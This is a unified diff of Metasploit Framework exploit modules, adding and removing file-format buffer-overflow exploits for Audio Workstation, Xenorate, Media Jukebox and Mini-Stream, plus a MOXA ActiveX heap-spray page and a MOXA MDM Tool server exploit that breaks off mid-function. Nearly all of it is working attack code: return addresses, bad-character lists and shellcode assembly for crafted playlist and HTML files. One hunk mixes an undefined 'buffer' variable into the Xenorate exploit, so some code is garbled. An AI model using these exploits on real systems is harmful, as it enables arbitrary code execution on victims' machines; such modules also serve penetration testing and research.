# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
@ -5,27 +16,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
|
||||
When opening a malicious pls file with the Audio Workstation,
|
||||
a remote attacker could overflow a buffer and execute
|
||||
arbitrary code.
|
||||
When opening a malicious pls file with the Audio Workstation,
|
||||
a remote attacker could overflow a buffer and execute
|
||||
arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'germaya_x', 'dookie', ],
|
||||
'Version' => '$Revision: 7724 $',
|
||||
'Version' => '$Revision: 10477 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-0476' ],
|
||||
[ 'OSVDB', '55424' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
},
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4100,
|
||||
|
@ -35,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
|
||||
],
|
||||
|
@ -43,10 +57,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'Dec 08 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'evil.pls']),
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
|
@ -59,12 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
|
||||
|
||||
pls = sploit
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
|
||||
file_create(pls)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,73 +1,80 @@
|
|||
##
|
||||
# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
include Msf::Exploit::Egghunter
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)',
|
||||
'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in Xenorate 2.50
|
||||
By creating a specially crafted xpl playlist file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
This module exploits a stack buffer overflow in Xenorate 2.50
|
||||
By creating a specially crafted xpl file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'loneferret, original by germaya_x' ],
|
||||
'Version' => '$Revision: $',
|
||||
'Author' =>
|
||||
[
|
||||
'hack4love <hack4love [at] hotmail.com>',
|
||||
'germaya_x',
|
||||
'loneferret',
|
||||
'jduck'
|
||||
],
|
||||
'Version' => '$Revision: 10477 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '57162' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10371' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
},
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 5100,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
||||
'DisableNops' => 'True',
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll
|
||||
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 10 2009',
|
||||
'DisclosureDate' => 'Aug 19 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'evil.xpl']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# Unleash the Egghunter!
|
||||
eh_stub, eh_egg = generate_egghunter
|
||||
|
||||
sploit = rand_text_alpha_upper(88)
|
||||
sploit << "\xEB\x06\x90\x90"
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << make_nops(20)
|
||||
buffer << eh_stub
|
||||
buffer << rand_text_alpha_upper(2000)
|
||||
buffer << eh_egg * 2
|
||||
sploit << generate_seh_payload(target.ret)
|
||||
sploit << payload.encoded
|
||||
|
||||
xpl = sploit
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
|
||||
file_create(xpl)
|
||||
file_create(sploit)
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -1,3 +1,7 @@
|
|||
##
|
||||
# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -11,31 +15,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in Media Jukebox 8.0.400
|
||||
By creating a specially crafted m3u or pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Media Jukebox 8.0.400
|
||||
By creating a specially crafted m3u or pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ron Henry - <rlh [at] ciphermonk.net>',
|
||||
'Ron Henry <rlh[at]ciphermonk.net>',
|
||||
'dijital1',
|
||||
],
|
||||
'Version' => '$Revision: 7828 $',
|
||||
'Version' => '$Revision: 11516 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '' ],
|
||||
[ 'URL', 'http://www.exploit-db.com' ],
|
||||
[ 'OSVDB', '55924' ],
|
||||
[ 'CVE', '2009-2650']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'July 1 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
|
@ -60,15 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
|
||||
sploit << rand_text_alphanumeric(262)
|
||||
sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
|
||||
sploit << rand_text_alphanumeric(262)
|
||||
sploit << generate_seh_payload(target.ret)
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -1,3 +1,7 @@
|
|||
##
|
||||
# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -15,27 +19,28 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in Mini-Stream 3.0.1.1
|
||||
By creating a specially crafted pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
|
||||
By creating a specially crafted pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Corlan Security Team ',
|
||||
'Ron Henry - <rlh [at] ciphermonk.net> - EIP Offset fix',
|
||||
'CORELAN Security Team ',
|
||||
'Ron Henry <rlh[at] ciphermonk.net>', # Return address update
|
||||
'dijital1',
|
||||
],
|
||||
'Version' => '$Revision: 7828 $',
|
||||
'Version' => '$Revision: 11516 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '' ],
|
||||
[ 'OSVDB', '61341' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 25 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
|
@ -60,16 +66,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = rand_text_alphanumeric(17403)
|
||||
sploit = rand_text_alphanumeric(17403)
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << "CAFE" * 8
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
print_status("Copy .pls to webserver and pass the URL to the application")
|
||||
|
||||
print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -1,78 +0,0 @@
|
|||
##
|
||||
# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Media Jukebox 8.0.400
|
||||
By creating a specially crafted m3u or pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ron Henry <rlh[at]ciphermonk.net>',
|
||||
'dijital1',
|
||||
],
|
||||
'Version' => '$Revision: 11516 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '55924' ],
|
||||
[ 'CVE', '2009-2650']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 3000,
|
||||
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], # 0x02951457 pop, pop, ret dsp_mjMain.dll
|
||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'July 1 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
|
||||
sploit << rand_text_alphanumeric(262)
|
||||
sploit << generate_seh_payload(target.ret)
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
end
|
||||
|
||||
end
|
|
@ -1,81 +0,0 @@
|
|||
##
|
||||
# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Xenorate 2.50
|
||||
By creating a specially crafted xpl file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'hack4love <hack4love [at] hotmail.com>',
|
||||
'germaya_x',
|
||||
'loneferret',
|
||||
'jduck'
|
||||
],
|
||||
'Version' => '$Revision: 10477 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '57162' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10371' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 5100,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Aug 19 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = rand_text_alpha_upper(88)
|
||||
sploit << generate_seh_payload(target.ret)
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -1,81 +0,0 @@
|
|||
##
|
||||
# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
|
||||
When opening a malicious pls file with the Audio Workstation,
|
||||
a remote attacker could overflow a buffer and execute
|
||||
arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'germaya_x', 'dookie', ],
|
||||
'Version' => '$Revision: 10477 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-0476' ],
|
||||
[ 'OSVDB', '55424' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4100,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
||||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 08 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = rand_text_alpha_upper(1308)
|
||||
sploit << "\xeb\x16\x90\x90"
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << make_nops(32)
|
||||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -1,80 +0,0 @@
|
|||
##
|
||||
# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
|
||||
By creating a specially crafted pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'CORELAN Security Team ',
|
||||
'Ron Henry <rlh[at] ciphermonk.net>', # Return address update
|
||||
'dijital1',
|
||||
],
|
||||
'Version' => '$Revision: 11516 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '61341' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 3500,
|
||||
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ], # 0x7e429353 JMP ESP - USER32.dll
|
||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 25 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
sploit = rand_text_alphanumeric(17403)
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << "CAFE" * 8
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application")
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -1,102 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
|
||||
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
|
||||
an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'MC' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-4742' ],
|
||||
[ 'OSVDB', '68986'],
|
||||
[ 'URL', 'http://www.moxa.com' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
|
||||
],
|
||||
'DisclosureDate' => 'Oct 19 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Create some nops.
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
|
||||
# Set the return.
|
||||
ret = Rex::Text.uri_encode([target.ret].pack('L'))
|
||||
|
||||
# Randomize the javascript variable names.
|
||||
vname = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(30) + 2)
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(rand(100) + 1)
|
||||
rand5 = rand_text_alpha(rand(100) + 1)
|
||||
rand6 = rand_text_alpha(rand(100) + 1)
|
||||
rand7 = rand_text_alpha(rand(100) + 1)
|
||||
rand8 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
content = %Q|
|
||||
<html>
|
||||
<object id ='#{vname}' classid='clsid:5B32067A-121B-49DE-8182-91EB13DDF8D6'></object>
|
||||
<script language ="javascript">
|
||||
var #{rand1} = unescape('#{shellcode}');
|
||||
var #{rand2} = unescape('#{nops}');
|
||||
var #{rand3} = 20;
|
||||
var #{rand4} = #{rand3} + #{rand1}.length;
|
||||
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
|
||||
var #{rand5} = #{rand2}.substring(0,#{rand4});
|
||||
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
|
||||
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
|
||||
var #{rand7} = new Array();
|
||||
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
|
||||
var #{rand8} = "";
|
||||
for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
|
||||
#{vname}.PlayFileName = #{rand8};
|
||||
</script>
|
||||
</html>
|
||||
|
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
|
||||
file_create(content)
|
||||
end
|
||||
|
||||
end
|
|
@ -1,76 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
|
||||
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
|
||||
attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'Ruben Santamarta', 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-4741'],
|
||||
[ 'OSVDB', '69027'],
|
||||
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
|
||||
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 600,
|
||||
'BadChars' => "\x00\x0a\x0d\x20",
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 20 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
client.get_once
|
||||
|
||||
sploit = rand_text_alpha_upper(18024)
|
||||
|
||||
sploit[0, 4] = [0x29001028].pack('V')
|
||||
sploit[472, payload.encoded.length] = payload.encoded
|
||||
